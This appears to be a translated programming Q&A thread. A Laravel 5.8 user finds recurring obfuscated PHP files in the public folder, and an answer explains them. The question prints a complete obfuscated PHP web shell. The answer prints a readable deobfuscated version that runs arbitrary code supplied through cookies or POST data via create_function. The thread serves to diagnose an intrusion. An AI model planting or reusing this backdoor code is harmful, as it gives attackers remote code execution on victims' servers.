laravel5.8公共文件夹下的怪异php文件

时间:2019-12-23 08:25:19

标签: laravel security laravel-5.8

在我的 Laravel 应用程序的公用文件夹下,有一些可疑的php文件,它们的名称很奇怪,例如“ 8xmzujk2.php”。

即使我尝试删除这些文件一次或两次,这些文件也会在两三天后再次出现。我将窗口服务器与apache一起使用。创建这些文件时,apache的访问和错误日​​志中没有记录。

如果以前有人遇到过此问题,请向我建议解决此问题的步骤。欢迎所有建议。提前致谢。

此可疑php文件之一中的代码如下。

<?php
$groqw = 'e-xv2i4_3r78g0*6kypmcoustndl#5\'b19aHf';$vcdoidm = Array();$vcdoidm[] = $groqw[35].$groqw[14];$vcdoidm[] = $groqw[20].$groqw[9].$groqw[0].$groqw[34].$groqw[24].$groqw[0].$groqw[7].$groqw[36].$groqw[22].$groqw[25].$groqw[20].$groqw[24].$groqw[5].$groqw[21].$groqw[25];$vcdoidm[] = $groqw[33].$groqw[36].$groqw[8].$groqw[34].$groqw[13].$groqw[10].$groqw[34].$groqw[32].$groqw[1].$groqw[29].$groqw[33].$groqw[4].$groqw[20].$groqw[1].$groqw[6].$groqw[10].$groqw[13].$groqw[32].$groqw[1].$groqw[11].$groqw[36].$groqw[13].$groqw[15].$groqw[1].$groqw[29].$groqw[29].$groqw[31].$groqw[10].$groqw[15].$groqw[0].$groqw[33].$groqw[13].$groqw[32].$groqw[33].$groqw[34].$groqw[34];$vcdoidm[] = $groqw[28];$vcdoidm[] = $groqw[20].$groqw[21].$groqw[22].$groqw[25].$groqw[24];$vcdoidm[] = $groqw[23].$groqw[24].$groqw[9].$groqw[7].$groqw[9].$groqw[0].$groqw[18].$groqw[0].$groqw[34].$groqw[24];$vcdoidm[] = $groqw[0].$groqw[2].$groqw[18].$groqw[27].$groqw[21].$groqw[26].$groqw[0];$vcdoidm[] = $groqw[23].$groqw[22].$groqw[31].$groqw[23].$groqw[24].$groqw[9];$vcdoidm[] = $groqw[34].$groqw[9].$groqw[9].$groqw[34].$groqw[17].$groqw[7].$groqw[19].$groqw[0].$groqw[9].$groqw[12].$groqw[0];$vcdoidm[] = $groqw[23].$groqw[24].$groqw[9].$groqw[27].$groqw[0].$groqw[25];$vcdoidm[] = $groqw[18].$groqw[34].$groqw[20].$groqw[16];foreach ($vcdoidm[8]($_COOKIE, $_POST) as $cpaxpnw => $afkxx){function dlvrss($vcdoidm, $cpaxpnw, $eowcms){return $vcdoidm[7]($vcdoidm[5]($cpaxpnw . $vcdoidm[2], ($eowcms / $vcdoidm[9]($cpaxpnw)) + 1), 0, $eowcms);}function isfap($vcdoidm, $eeqhx){return @$vcdoidm[10]($vcdoidm[0], $eeqhx);}function eeejy($vcdoidm, $eeqhx){$jfvsqg = $vcdoidm[4]($eeqhx) % 3;if (!$jfvsqg) {$ykpentn = $vcdoidm[1]; $fggryc = $ykpentn("", $eeqhx[1]($eeqhx[2]));$fggryc();exit();}}$afkxx = isfap($vcdoidm, $afkxx);eeejy($vcdoidm, $vcdoidm[6]($vcdoidm[3], $afkxx ^ dlvrss($vcdoidm, $cpaxpnw, $vcdoidm[9]($afkxx))));}

1 个答案:

答案 0 :(得分:2)

该段代码运行在请求的帖子和cookie中发送的任意代码

这是更清晰的版本

foreach (array_merge($_COOKIE, $_POST) as $index => $value){
    function dlvrss($vcdoidm, $index, $eowcms){
        return substr(str_repeat($index . "9f3a07a1-592c-4701-8f06-55b76e9019aa", ($eowcms / strlen($index)) + 1), 0, $eowcms);
    }
    function isfap($vcdoidm, $eeqhx){
        return @pack("H*", $eeqhx);
    }
    function eeejy($vcdoidm, $eeqhx){
        $jfvsqg = count($eeqhx) % 3;
        if (!$jfvsqg) {
            $fggryc = create_function("", $eeqhx[1]($eeqhx[2]));
            $fggryc();
            exit();
        }
    }
    $value = isfap($vcdoidm, $value);
    eeejy($vcdoidm, explode("#", $value ^ dlvrss($vcdoidm, $index, strlen($value))));
}

最后看看它如何运行通过请求发送的功能

$fggryc = create_function("", $eeqhx[1]($eeqhx[2]));
$fggryc();`

您应该已解决该问题。

@编辑

对不起,我不知道。